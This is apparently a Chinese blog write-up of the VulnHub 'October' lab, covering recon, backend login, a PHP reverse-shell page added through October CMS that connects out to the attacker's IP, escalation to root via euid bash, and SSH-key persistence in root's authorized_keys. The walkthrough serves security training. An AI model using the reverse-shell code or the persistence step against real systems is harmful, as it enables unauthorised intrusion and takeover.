VulnHub 靶场--October
VulnHub 靶场--October
- 靶场搭建:
- 靶场渗透:
- 00x1: 信息收集
- 00x2: 漏洞利用
- 00x3: 系统提权
- 00x4: SSH登录
靶场搭建:
下载完导入虚拟机,然后使用默认桥接模式即可。
下载链接:https://www.vulnhub.com/entry/its-october-1,460/
如果出现IP无法分配可参考:
https://www.cnblogs.com/yichen115/p/12609048.html
靶场渗透:
00x1: 信息收集
指纹信息:
端口扫描:
目录扫描:
后台:http://172.16.200.164/backend
关键信息:
从源代码获取信息,得到账户密码。
使用该账户密码,成功登录后台。
00x2: 漏洞利用
在信息收集后,接下来就是漏洞的挖掘和利用了,发现可利用点有:
利用点 | 攻击方式 |
---|---|
ssh 、mysql | 爆破 |
octobers CMS | 版本漏洞 |
爆破并没有什么收获,漏洞库一查,发现October cms漏洞还是特多的。
尝试使用msf getshell, 但是利用失败:
使用后台添加页面模块反弹shell,
function onstart(){$s=fsockopen("172.16.200.158",12345);$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
}
添加shell页面后,使用NC 监听端口,访问页面获取shell:
00x3: 系统提权
使用LinEnum脚本收集系统信息
使用以下命令获取一个bash:
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
这里可以看到uid虽然是www-data的,但是euid却是root的。
linux系统中每个进程都有2个ID,分别为用户ID(uid)和有效用户ID(euid),UID一般表示进程的创建者(属于哪个用户创建),而EUID表示进程对于文件和资源的访问权限(具备等同于哪个用户的权限)。
这里我们已经可以看到proof了。
00x4: SSH登录
使用ssh密钥替换实现远程登录。
本地生成ssh秘钥后,并将公钥拷贝到web目录。接着在被攻击机上下载,然后拷贝到/root/.ssh/authorized_keys路径下
最后在攻击机上使用root私钥进行ssh连接:
VulnHub 靶场--October相关推荐
- 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1
兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...
- VulnHub靶场系列:Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
- Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...
- vulnhub靶场,bulldog1
vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...
- vulnhub靶场,Monitoring
vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...
- vulnhub靶场{GoldenEye-v1靶场实战}
远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- vulnhub靶场,FirstBlood
vulnhub靶场,FirstBlood 环境准备 靶机下载地址:https://www.vulnhub.com/entry/firstblood-1,564/ 攻击机:kali(192.168.10 ...
- VulnHub靶场LupinOne
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...
- Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)
Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...
最新文章
- 面向Mobile device的CNN模型手工设计与NAS分析总结,MobileNet V1,V2,V3,Efficient,MNasNet以及Efficient network design
- 职称计算机word模拟题,2015职称计算机考试Word2003模拟题及答案
- ubuntu 常见配置文件
- MySQL 8.0 首个自适应参数横空出世
- linux 备份文件
- Visual Studio 2008创建项目(ATL)
- 输电线路巡检机器人PPT_国网泰安供电公司开展输电线路无人机精细化巡检
- JAVA数据库增删改查
- 破解新浪微博js加密登陆超详细
- illumina不愧是二代测序无冕之王
- 新华三2018校园招聘笔试面试题学习
- SaaSBase:什么是JIRA?
- ferguson博弈_组合博弈游戏
- 【实用工具】Visio画时序图组件
- 《微波原理与技术》学习笔记3传输线理论-史密斯圆图(Smith Chart)
- 实现C#和Python高效率混合编程
- [ CTF ]【天格】战队WriteUp- 2022年第三届“网鼎杯”网络安全大赛(青龙组)
- java夯实基础-基本数据类型
- 第七周【任务2】长短期记忆网络LSTM的前向、后向传播
- OpenJudge NOI 1.13 11:回文素数
热门文章
- 理解VML||MKL
- OPC DA 到 OPC UA
- ewebeditor漏洞利用总结
- Error running ‘Tomcat8.5‘ port out of range-1 (moments ago)
- 汽车零部件生产质量安全,路在何方?
- 线性独立成分分析(ICA)与鸡尾酒会问题
- 统计文件中元音字母的数量
- 移动端和网页端公告栏文字右向左轮播滑动
- ClickHouse可视化DBM Release 1.13.0
- mysql 错误码1236,MySQL错误:Last_IO_Errno:1236处理办法